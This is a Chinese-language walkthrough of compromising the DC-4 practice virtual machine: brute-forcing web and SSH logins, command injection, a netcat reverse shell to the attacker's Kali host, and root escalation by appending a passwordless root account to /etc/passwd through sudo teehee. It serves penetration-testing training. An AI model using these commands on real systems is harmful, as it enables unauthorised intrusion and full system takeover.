滲透DC-4靶機實戰筆記
試驗環境:
靶機環境:DC-4
攻擊機:kali
掃描同網段存活主機、開放端口,尋找突破點;
存活主機IP地址是192.168.11.140
掃描其主機信息和開放端口號,開放了22號端口可以考慮爆破。
也開放80號端口,web服務器是nginx1.15
訪問是這樣的,大概知道滲透這個靶機是考驗我們的爆破技術了吧,這裏習慣性的先嚐試了一下弱口令不成功,這裏我準備在虛擬機使用hydra對ssh進行爆破,我的物理機用burp suite對網站進行爆破看誰快一點;
但是後來我覺得burpsuite可能性大一點,這裏知道用戶名是admin
抓包發送到intruder模塊,拿出我的常用字典進行爆破;
發現happy的返回的長度不一致,然後用密碼試着登錄一下看是否能成功;
果然登錄進去了
點進去發現可以執行一些命令,第一個執行ls -l ,我們再來抓包看看:
發現是可以修改參數執行其他命令的,那我們先查看當前路徑試試:
執行成功,既然這裏可以執行命令那就相當於拿到一個普通用戶的權限,可以shell反彈到我們的kali機上。
原本我想直接反彈shell拿到一個bash的交互環境,但是這裏有個&在這裏不好使,所以就先反彈一個shell:
kali上監聽7777端口,抓包修改命令爲:
nc -e /bin/sh 192.168.11.129 7777
反彈成功出現如下界面:
進入之後喜歡隨便逛逛發現了ssh的配置文件,好像可以改爲免密登錄但是還是要先知道登陸用戶名,對ssh的配置不熟悉,等下可以試試看(事實上等下我就懶得看了)
下面使用python方法拿一個bash:
python -c 'import pty;pty.spawn("/bin/sh")'
然後就找啊找發現home目錄下jim目錄下有個備份文件(.bak)
將密碼複製在本地生成一個密碼本
然後本地利用hydra爆破ssh,說實話是真心慢呀;
(是不是就應該設置默認線程)
最後還是跑出來了,這裏密碼是jibril04,然後使用遠程登錄
登錄成功並獲得jim用戶的權限,查看目錄下mbox是什麼,發現是一封測試郵件;
進入/var/mail目錄下查看jim
得到Charles用戶的密碼,接下來肯定是要登錄這個賬號了;
用戶名:charles 密碼:^xHhA&hvim0y
然後應該就要進行提權了,在刷前三個靶機的時候學到的幾種姿勢這裏好像用不上,比如內核提權和SUID提權,並沒有含有SUID權限的文件,這裏就會接觸sudo提權啦
登錄之後查看sudo的權限
sudo -l
也就是查看這個用戶有哪些具有root權限的命令;
發現teehee命令可以使用,teehee --help看看有些應該怎麼用
發現這個命令有追加文件的功能,那怎麼通過追加文件的功能得到root權限呢,想到了/etc/passwd可以追加一個用戶
或者通過teehee的sudo提升權限以 root身份寫入crontab計劃任務通過執行獲取root權限兩種方法都可以;
後者也算是定時任務的提權類型吧;
這裏我就是做的第一種提權方式,然後通過管道符使teehee執行命令
追加的內容共有七個字段,要符合格式不然還是得不到root權限
echo "admin::0:0:::/bin/bash" | sudo teehee -a /etc/passwd
這裏將無密碼用戶admin寫入到/etc/passwd文件
然後切換登錄admin即可拿到flag
總結
就是利用爆破和Sudo提權,以及一雙善於發現線索的眼睛